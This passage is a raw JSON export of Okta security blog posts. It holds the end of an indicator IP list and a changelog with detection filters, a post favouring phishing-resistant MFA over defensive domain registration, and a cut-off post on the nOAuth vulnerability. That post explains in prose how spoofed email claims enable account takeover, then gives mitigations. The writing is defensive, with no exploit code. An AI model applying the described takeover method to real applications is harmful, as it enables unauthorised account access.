e-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"73.205.234.246\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"99.25.84.9\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"185.56.83.225\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"table-row\",\"data\":{},\"content\":[{\"nodeType\":\"table-cell\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"96.244.225.43\",\"marks\":[],\"data\":{}}]}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-3\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Change Log\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.2 - Mar 8, 2024\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated recommendations to include new features released as part of Okta Secure Identity Commitment: Protected Actions, ASN/IP Session Binding.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated detections section to include System Log event for an authentication failure arising from session 
binding.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.1 - Sep 9, 2023\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated Prevention section to include advice on constraining help desk administrators to specific user groups.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Updated Detection section. While defenders can alert on IdP creation (eventType eq \\\"system.idp.lifecycle.create\\\"), an alternative approach is to alert on any creation or modification using the \\\"starts with\\\" qualifier (eventType sw \\\"system.idp.lifecycle\\\")\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"1.0 - Sep 1, 2023\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Original Version Published\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-25T18:19:21.977Z","secAuthor":[{"id":"40144a58-c93f-5b84-895a-5658f212b168","bio":{"bio":"<p>The Defensive Cyber Operations (DCO) team is responsible for detecting and responding to cyber threats that impact Okta or our customers via the Okta platform. 
Our intelligence-driven capability identifies the adversaries most likely to impact Okta and our customers, and prioritises our defensive capabilities based on the threats most likely to be realised.</p>"},"image":null,"name":"Defensive Cyber Operations","jobTitle":"","slug":"defensive-cyber-operations","node_locale":"en"}]},{"slug":"/articles/2024/04/defensive-domain-registration-mugs-game","id":"55644c31-0632-528d-b757-fc42ee1cbacd","title":"Defensive Domain Registration is a Mug’s Game ","date":"2024-04-03T16:49:17+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Summary:\",\"marks\":[{\"type\":\"bold\"}],\"data\":{}},{\"nodeType\":\"text\",\"value\":\" The time and effort spent on defensive domain registration would be better invested in writing phishing-resistant authentication policies.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Today I want to make the case that registering domains for the sole purpose of protecting against phishing is tackling the phishing problem from the wrong angle. It is, to use a very British idiom, a “mug’s game”: an effort that’s unlikely to yield much success. Most organizations register additional domains based on various permutations of their primary production domain. Sometimes domains are registered to deter potential competitors, and the registrations are aimed at protecting their brand from trademark infringement. 
Increasingly, we see organizations acquiring domains to deter attackers from registering domains used in social engineering campaigns.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Once you get started on the latter, the pertinent question becomes how many permutations on your domain you’re willing to invest in. Where do you stop?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"There is a stronger case to be made for registering key domains that help to catch emails gone awry (the inevitable “fat finger” errors). In the grand scheme of things, domains are cheap.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"But once we start considering defensive domain registrations, the value of every subsequent registration diminishes. By using a tool like \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://github.com/elceef/dnstwist\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"dnstwist\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", you can very quickly see how big the game of whack-a-mole could be. With a 4-character domain name, dnstwist generates over 1000 domains. If you multiply this against additional brands and common phishing keywords (support, login, helpdesk, etc), the scope of the problem easily explodes by orders of magnitude.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Conservatively, registering all these domains could easily cost $100k+ per year. Even after you’ve expended this effort, adversaries can always find yet more permutations of your domain (or the services your users are familiar with) that you haven’t considered. 
And at the end of the day, registering those domains hasn’t moved the security needle one bit: we have merely expended scarce budget on a few surmountable hurdles for an attacker to side-step.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Let’s just eliminate the phishing problem?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Writing in this blog, my colleagues and I have implored Okta customers to embrace phishing-resistant factors like Okta FastPass and FIDO2 WebAuthn, for a number of good reasons.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Preventative controls are nearly always far more desirable than compensating controls. FastPass or WebAuthn can essentially eliminate phishing attacks that target user authentication. The same can’t be said for defensive domain registrations. The TL;DR is that phishing-resistant methods of authentication cannot be phished the way legacy factors like passwords and basic MFA (OTP, SMS, etc.) can, because the credential is scoped - that is, cryptographically bound - to the origin it was registered for, and the browser or platform enforces that binding rather than the user. In other words, a phishing-resistant factor will never authenticate to a domain it was not enrolled in, even if the user has been tricked into visiting a look-alike site.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Not only is this an effective security control, the user experience is far better than a password or any combination of legacy factors. 
As described in the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/the-secure-sign-in-trends-report/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Secure Sign-in Trends Report\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", phishing-resistant factors including FastPass and WebAuthn are:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Faster to enroll\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Faster to use\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Fail less often\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Are not susceptible to brute-force attacks\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Inherently more secure (Phishing-resistant)\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Able to satisfy multiple factor requirements with a single user action (Biometric + Possession)\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"How can I start using FastPass?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Assuming you’re using Okta Identity 
Engine (OIE), FastPass is already available to you. If you’re still on Okta Classic, this is another great excuse to take the free upgrade to OIE.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Here are some resources I recommend to help you get started:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://help.okta.com/oie/en-us/content/topics/identity-engine/devices/fp/fp-main.htm\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta FastPass | Okta Docs\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-fastpass-deployment-guide/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Becoming phishing resistant with Okta FastPass | Step-by-step guide\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.youtube.com/watch?v=7tv300TIWBs\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Going Password-less in Okta Identity Engine | Okta Demo 
Video\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/webinar-oktas-journey-to-passwordless-phishing-resistance/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta’s journey to passwordless & phishing-resistance | Oktane Video\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/10/the-need-for-phishing-resistant-multi-factor-authentication/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"How modern credential phishing attacks work: the adversary in the middle (Part 1) | Blog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/11/a-deep-dive-into-okta-fastpass/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"A Deep Dive Into Okta FastPass (Part 2) | 
Blog\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/resources/whitepaper-fastpass-technical-whitepaper/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"FastPass | Technical Whitepaper\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If your Workforce org is licensed for Adaptive MFA, I’d also recommend this cheeky rule that packs a lot of punch. An attacker that has stolen user credentials and/or a session cookie will almost always sign in from a New Device and a New IP address. With \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/#security-context\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Okta Expression Langua\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/reference/okta-expression-language-in-identity-engine/#security-context\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"ge\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", we can force authentication attempts from New Devices and New IPs to prompt for phishing-resistant 
factors:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4V2FWuO0AT65orxInEGo9p\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"6KS0Vi5RrCDQ3BuF7VO9Q\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Making all user authentication flows phishing-resistant should be the north star for user identity. And Okta isn’t the only team offering guidance on this. If you need some impartial evidence, try:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"National Institute of Standards and Technology (NIST) - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://csrc.nist.gov/pubs/sp/800/63/4/ipd\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Digital Identity Guidelines\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Cybersecurity and Infrastructure Security Agency (CISA) - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cisa.gov/MFA\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"More than a Password\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Australian Signals Directorate (ASD) - 
\",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.cyber.gov.au/resources-business-and-government/essential-cyber-security/essential-eight/essential-eight-maturity-model\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Essential Eight Maturity Model\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The Executive Office of the US President - \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.whitehouse.gov/wp-content/uploads/2022/01/M-22-09.pdf\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"Moving the U.S. Government Toward Zero Trust Cybersecurity Principles\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\"\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"It’s time to take the phishing-resistant plunge, and Okta is here to help.\",\"marks\":[],\"data\":{}}]}]}"},"summary":null,"updatedAt":"2024-06-25T00:41:45.508Z","secAuthor":[{"id":"b006f4e2-a177-55cd-a2ee-ff041e6ece35","bio":{"bio":"<p>John leads the EMEA node of Okta's Detection and Response Engineering team.</p>\n\n<p>His team develops detections and supplementary automations to protect Okta from threat actors, which in turn inform our rotational response and threat hunting missions.</p>"},"image":{"url":"https://images.ctfassets.net/kbkgmx9upatd/3156PfzPum7cu577jTvWv5/fda95a934e6567e0d6f41e6ce1da8c56/johnmurphy.jpg"},"name":"John Murphy","jobTitle":"Manager, Defensive Cyber Operations (EMEA)","slug":"john-murphy","node_locale":"en"}]},{"slug":"/articles/2023/08/saying-no-thanks-noauth","id":"20cb0e89-6af9-5249-9263-bc15b89c5ada","title":"Saying “No Thanks” to 
nOAuth","date":"2023-08-04T22:26:49+00:00","sys":{"contentType":{"sys":{"id":"secBlogpost","linkType":"ContentType","type":"Link"}},"type":"Entry"},"body":{"raw":"{\"nodeType\":\"document\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"You may have heard about a vulnerability called “nOAuth”, where, per Microsoft, “use of the email claim from access tokens for authorization can lead to an escalation of privilege.” What is this vulnerability, how can Okta help, and what are the mitigation steps and strategies to keep your own environment nOAuth free? Let’s break it down!\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"What is nOAuth?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Discovered in April of 2023, \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.descope.com/blog/post/noauth\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"by researchers at descope\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", the nOAuth vulnerability relies on user accounts being merged by an OAuth application that offers Microsoft Azure AD sign-in, in a way that allows an attacker to take over a user account.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The vulnerable condition was observed in several unique combinations of OAuth applications, identity providers, and where “Log in with Microsoft” was offered as a sign-in method. 
While the research named Microsoft-specific methods of sign-in, we feel there are lessons to be learned by all developers of OAuth apps, irrespective of which identity provider they rely on.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The nOAuth Attack\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The attack works like this: adversaries first create a new Azure AD administrator account (in an attacker-owned tenant) and alter its email address to match that of their intended target. There are two unique conditions that must be met for this to result in account takeover.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"An OAuth application must:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Trust the “email” claim for verifying users (which is not a recommended practice), and\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Merge user accounts whenever a user signs-in via “Sign in with Microsoft” (social login). 
The user must have previously signed into the app using some alternative mechanism to trigger the merge event.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"If the application merges user accounts without proper validation, the attacker gains control over the target's application account, even if the victim didn't have a Microsoft account to sign-in with.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While many elements must align for this attack to work, the nOAuth attack is difficult to remedy in that it requires remediative action by both the Identity Provider (in this case, Microsoft) and the vulnerable third-party application.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Got it. What does Microsoft say about all this?\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft released \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://learn.microsoft.com/en-us/azure/active-directory/develop/migrate-off-email-claim-authorization\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"guidance\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" on \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://msrc.microsoft.com/blog/2023/06/potential-risk-of-privilege-escalation-in-azure-ad-applications/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"how to manage the nOAuth vulnerability\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", including:\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Never use an email 
claim for authorization purposes.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Use the \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://learn.microsoft.com/en-us/graph/applications-authenticationbehaviors?tabs=http\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"authenticationBehaviors\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" API to configure existing applications so that unverified email claims are omitted from their tokens, mitigating the risk without a code change.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"When developers are ready to update their code and migrate users to an immutable identifier such as the oid (object ID) claim, they can use the “xms_edov” claim to confirm that the email address is verified in the Azure AD tenant before the account's identifier is migrated.\",\"marks\":[],\"data\":{}}]}]}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Microsoft also told customers that it, “deployed mitigations to omit token claims from unverified domain owners for most applications”. As such, given the above advice and mitigations, we’ve mostly reached the end of the nOAuth saga. However, there’s more to consider on the topic, and we’d be remiss (and we hate being remiss) if we didn’t go a bit deeper here, because now that we know the what and how of nOAuth, we can bring the Okta world and philosophy into focus.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"heading-2\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Saying “No Thanks” to nOAuth\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"First off, it's important to note that this vulnerability stems from a misplaced trust in self-asserted email addresses. 
However, the novel (and alarming) part of nOAuth is that the attack works across Azure AD tenants, rather than being contained within them.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"By contrast, the Okta Workforce Identity Cloud (WIC) is architected around per-tenant (“Okta Org”) federation, and it's up to the Org administrator to determine what identifiers to support. Our tenant boundary is strict: an org administrator can't impersonate users in a different org. Our risk lens is even more granular: by using \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://www.okta.com/blog/2022/07/build-highly-scalable-secure-apps/\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"per-application signing keys\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\", administrators can also mitigate risk across application instances, even within a single org.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"One easy remediation within Okta's Universal Directory is configuring \\\"primaryEmail\\\" to be a read-only attribute that end users cannot change (see screenshot below).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"4UVEYrFI7wsHmCqNGhpX3G\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This attribute can also be sourced from HR or other external systems of record; these are the typical solutions for a workforce deployment.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"While Okta Customer Identity offers the option to allow unverified emails to be used as part of Self-Service Registration (see screenshot below); the blast radius is again squarely within the 
tenant itself.\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"embedded-asset-block\",\"data\":{\"target\":{\"sys\":{\"id\":\"2qhsm84O46GwgEaMNse0Ze\",\"type\":\"Link\",\"linkType\":\"Asset\"}}},\"content\":[]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"Furthermore, the iss (issuer) of Microsoft tokens is the shared \\\"MicrosoftOnline\\\" authority, whereas for Okta it is your own org (your-org.okta.com).\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"This vulnerability relies on the concept of leveraging a third-party “social login” combined with a reliance on unverified user-controlled input. Okta allows for a much more secure implementation, including detection tools that greatly diminish the opportunity for this type of third-party vulnerability. In general, applications should be \",\"marks\":[],\"data\":{}},{\"nodeType\":\"hyperlink\",\"data\":{\"uri\":\"https://developer.okta.com/docs/guides/validate-id-tokens/main/#verify-the-claims\"},\"content\":[{\"nodeType\":\"text\",\"value\":\"verifying JSON Web Token (JWT) claims\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"text\",\"value\":\" (after first verifying the token's signature against the issuer's published signing keys; an unverified token's claims prove nothing):\",\"marks\":[],\"data\":{}}]},{\"nodeType\":\"unordered-list\",\"data\":{},\"content\":[{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The iss (issuer) claim matches the identifier of your Okta authorization server.\",\"marks\":[],\"data\":{}}]}]},{\"nodeType\":\"list-item\",\"data\":{},\"content\":[{\"nodeType\":\"paragraph\",\"data\":{},\"content\":[{\"nodeType\":\"text\",\"value\":\"The aud (audience) claim should match the Client ID that you used to request the ID Token. 
